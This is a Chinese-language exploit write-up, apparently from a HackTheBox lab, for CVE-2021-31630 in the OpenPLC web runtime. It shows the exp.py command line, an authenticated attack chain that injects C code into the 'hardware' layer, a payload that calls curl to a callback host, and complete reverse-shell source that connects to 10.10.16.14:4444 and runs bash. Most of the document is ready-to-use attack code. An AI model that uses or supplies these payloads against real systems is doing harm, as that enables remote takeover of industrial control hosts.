## https://sploitus.com/exploit?id=5E354E0E-CD7F-5291-B4AE-D4E3B83E7ACB
# CVE-2021-31630
打HTB的机器时候碰到的cve,exploit-db的exp有些错误于是给出手工利用方式以及exp
## 脚本使用
命令执行无回回显
```shell
python exp.py -u http://127.0.0.1:8080 -l openplc -p openplc -c "whoami"
```
## 手工exp
后台的攻击链如下
创建st项目并编译→在hardware处加入恶意代码,并编译到项目本体中→start项目触发恶意代码
demo.st
```
PROGRAM prog0
VAR
var_in : BOOL;
var_out : BOOL;
END_VAR
var_out := var_in;
END_PROGRAM
CONFIGURATION Config0
RESOURCE Res0 ON PLC
TASK Main(INTERVAL := T#50ms,PRIORITY := 0);
PROGRAM Inst0 WITH Main : prog0;
END_RESOURCE
END_CONFIGURATION
```
以后台自带的模板为基础,增加了恶意代码的c文件
```c
#include "ladder.h"
#include<stdlib.h>
//-----------------------------------------------------------------------------
// DISCLAIMER: EDDITING THIS FILE CAN BREAK YOUR OPENPLC RUNTIME! IF YOU DON'T
// KNOW WHAT YOU'RE DOING, JUST DON'T DO IT. EDIT AT YOUR OWN RISK.
//
// PS: You can always restore original functionality if you broke something
// in here by clicking on the "Restore Original Code" button above.
//-----------------------------------------------------------------------------
//-----------------------------------------------------------------------------
// These are the ignored I/O vectors. If you want to override how OpenPLC
// handles a particular input or output, you must put them in the ignored
// vectors. For example, if you want to override %IX0.5, %IX0.6 and %IW3
// your vectors must be:
// int ignored_bool_inputs[] = {5, 6}; //%IX0.5 and %IX0.6 ignored
// int ignored_int_inputs[] = {3}; //%IW3 ignored
//
// Every I/O on the ignored vectors will be skipped by OpenPLC hardware layer
//-----------------------------------------------------------------------------
int ignored_bool_inputs[] = {-1};
int ignored_bool_outputs[] = {-1};
int ignored_int_inputs[] = {-1};
int ignored_int_outputs[] = {-1};
//-----------------------------------------------------------------------------
// This function is called by the main OpenPLC routine when it is initializing.
// Hardware initialization procedures for your custom layer should be here.
//-----------------------------------------------------------------------------
void initCustomLayer()
{
system("curl http://10.10.16.14:8000");
}
//-----------------------------------------------------------------------------
// This function is called by OpenPLC in a loop. Here the internal input
// buffers must be updated with the values you want. Make sure to use the mutex
// bufferLock to protect access to the buffers on a threaded environment.
//-----------------------------------------------------------------------------
void updateCustomIn()
{
// Example Code - Overwritting %IW3 with a fixed value
// If you want to have %IW3 constantly reading a fixed value (for example, 53)
// you must add %IW3 to the ignored vectors above, and then just insert this
// single line of code in this function:
// if (int_input[3] != NULL) *int_input[3] = 53;
}
//-----------------------------------------------------------------------------
// This function is called by OpenPLC in a loop. Here the internal output
// buffers must be updated with the values you want. Make sure to use the mutex
// bufferLock to protect access to the buffers on a threaded environment.
//-----------------------------------------------------------------------------
void updateCustomOut()
{
// Example Code - Sending %QW5 value over I2C
// If you want to have %QW5 output to be sent over I2C instead of the
// traditional output for your board, all you have to do is, first add
// %QW5 to the ignored vectors, and then define a send_over_i2c()
// function for your platform. Finally you can call send_over_i2c() to
// send your %QW5 value, like this:
// if (int_output[5] != NULL) send_over_i2c(*int_output[5]);
//
// Important observation: If your I2C pins are used by OpenPLC I/Os, you
// must also add those I/Os to the ignored vectors, otherwise OpenPLC
// will try to control your I2C pins and your I2C message won't work.
}
```
上传st文件,以新建项目
![image-20240330232607509](https://gitee.com/UserB1ank/picgo_bed/raw/master/image-20240330232607509.png)
点击upload按钮开始编译
![image-20240330232623198](https://gitee.com/UserB1ank/picgo_bed/raw/master/image-20240330232623198.png)
需要成功编译项目才能执行下一步攻击措施
![image-20240330232712740](https://gitee.com/UserB1ank/picgo_bed/raw/master/image-20240330232712740.png)
在hardware处注入恶意代码
![image-20240330232748945](https://gitee.com/UserB1ank/picgo_bed/raw/master/image-20240330232748945.png)
点击下方save按钮,代码会被编译进项目中
![image-20240330232819994](https://gitee.com/UserB1ank/picgo_bed/raw/master/image-20240330232819994.png)
编译成功后点击start按钮,即可执行恶意代码
![image-20240330232845938](https://gitee.com/UserB1ank/picgo_bed/raw/master/image-20240330232845938.png)
成功接收到回显
![image-20240330232902304](https://gitee.com/UserB1ank/picgo_bed/raw/master/image-20240330232902304.png)
反弹shell
```
#include "ladder.h"
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int ignored_bool_inputs[] = {-1};
int ignored_bool_outputs[] = {-1};
int ignored_int_inputs[] = {-1};
int ignored_int_outputs[] = {-1};
void initCustomLayer()
{
int port = 4444;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("10.10.16.14");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"bash", NULL};
execvp("bash", argv);
}
void updateCustomIn()
{
}
void updateCustomOut()
{
}
```